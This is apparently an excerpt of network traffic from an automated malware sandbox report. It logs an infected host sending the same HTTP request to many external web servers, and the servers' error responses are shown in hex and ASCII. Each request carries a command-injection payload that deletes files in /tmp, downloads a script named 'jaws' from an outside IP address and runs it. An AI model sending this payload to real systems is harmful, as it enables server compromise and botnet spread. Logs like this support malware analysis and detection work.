                                                            275192.168.2.2333402104.22.63.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.603784084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            276192.168.2.2343902164.46.69.6080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.641849995 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:55.913209915 CET433INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Server: Apache
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            277192.168.2.2353710156.244.93.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.700500965 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:56.030119896 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            278192.168.2.235346823.220.88.19680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.747067928 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:56.123857975 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 37 33 32 63 33 31 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 35 26 23 34 36 3b 31 38 39 30 32 64 62 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;95732c31&#46;1706279515&#46;18902dba</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            279192.168.2.234398823.192.184.1280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.842282057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:56.082065105 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 64 66 62 64 32 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 35 26 23 34 36 3b 32 34 66 62 38 34 66 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9dfbd217&#46;1706279515&#46;24fb84fd</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            280192.168.2.233285262.29.79.280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.883506060 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            281192.168.2.2339126104.80.232.880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.941030979 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:56.224001884 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:56 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:56 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 31 65 33 36 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 36 26 23 34 36 3b 32 33 66 37 62 62 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5d1e3617&#46;1706279516&#46;23f7bb0</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            282192.168.2.2343070156.47.167.10980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.381828070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.521075964 CET911INHTTP/1.0 404 Not Found
                                                            Server: SonicWALL
                                                            Expires: -1
                                                            Cache-Control: no-cache
                                                            Content-type: text/html;charset=UTF-8
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 73 68 65 6c 6c 3f 63 64 20 26 23 78 32 46 3b 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;shell?cd &#x2F;tmp;rm -rf *;wget </span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            283192.168.2.2351486138.38.41.21680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.449347019 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            284192.168.2.235267435.169.65.16280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.502197981 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.617965937 CET493INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:59 GMT
                                                            Server: Apache/2.4.7 (Ubuntu)
                                                            Content-Length: 300
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            285192.168.2.234665818.65.143.7180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.566963911 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.888240099 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            286192.168.2.234216818.160.226.10580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.618951082 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.735717058 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            287192.168.2.2349056172.65.16.15380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.620311975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            288192.168.2.2358148167.71.50.3580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.714447021 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.926457882 CET503INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 309
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 75 6d 61 2e 73 63 6f 6f 70 2d 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at puma.scoop-os.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            289192.168.2.2351042134.73.222.13880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.715162039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.863660097 CET498INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Server: Apache/2.4.18 (Ubuntu)
                                                            Content-Length: 304
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 6d 61 7a 6f 6e 69 70 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at amazonip.net Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            290192.168.2.2358058154.19.112.20380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.717860937 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.868724108 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            291192.168.2.233672447.4.208.4680
                                                            TimestampBytes transferredDirectionData
